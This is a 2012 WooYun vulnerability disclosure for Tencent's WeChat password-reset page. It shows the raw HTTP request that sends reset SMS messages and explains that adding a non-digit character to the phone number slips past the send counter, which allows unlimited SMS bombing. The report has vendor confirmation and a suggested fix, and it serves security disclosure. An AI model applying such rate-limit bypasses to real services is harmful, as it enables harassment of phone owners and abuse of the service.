当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011957

漏洞标题:微信找回密码短信无限发

相关厂商:腾讯

漏洞作者: popok

提交时间:2012-09-10 01:20

修复时间:2012-10-25 01:20

公开时间:2012-10-25 01:20

漏洞类型:网络设计缺陷/逻辑错误

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-10: 细节已通知厂商并且等待厂商处理中
2012-09-10: 厂商已经确认,细节仅向厂商公开
2012-09-20: 细节向核心白帽子及相关领域专家公开
2012-09-30: 细节向普通白帽子公开
2012-10-10: 细节向实习白帽子公开
2012-10-25: 细节向公众公开

简要描述:

微信找回密码发送短信限制不严,导致可以无限发送,导致短信轰炸

详细说明:

发送短信的数据:

POST /cgi-bin/mmsupport-bin/getresetpwdurl HTTP/1.1
Host: support.weixin.qq.com
Connection: keep-alive
Content-Length: 85
Cache-Control: max-age=0
Origin: http://support.weixin.qq.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.152 Safari/535.19 CoolNovo/2.0.3.55
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://support.weixin.qq.com/cgi-bin/mmsupport-bin/readtemplate?uin=&stype=&promote=&fr=&lang=zh_CN&ADTAG=&check=false&t=w_password_phone&method=mobile
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: **********
lang=zh_CN&t=w_password_phone&method=wait&getmethod=web&country=A86&phone=180********


发送10条左右,就会提示号码对正确,看来后台有记数。
这时手机号后面随便加一个非数字符号,就能继续发送。
看来后台记数的时候没有对号码做验证,直接对post过来的号码记数了,但是发送的时候正则匹配了正确的号码,所以虽然加了符号,还是可以正常收到。

漏洞证明:

手机截图麻烦,不证明

修复方案:

记数时先验证一下号码

版权声明:转载请注明来源 popok@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-09-10 16:12

厂商回复:

感谢反馈,我们正在跟进处理。

最新状态:

暂无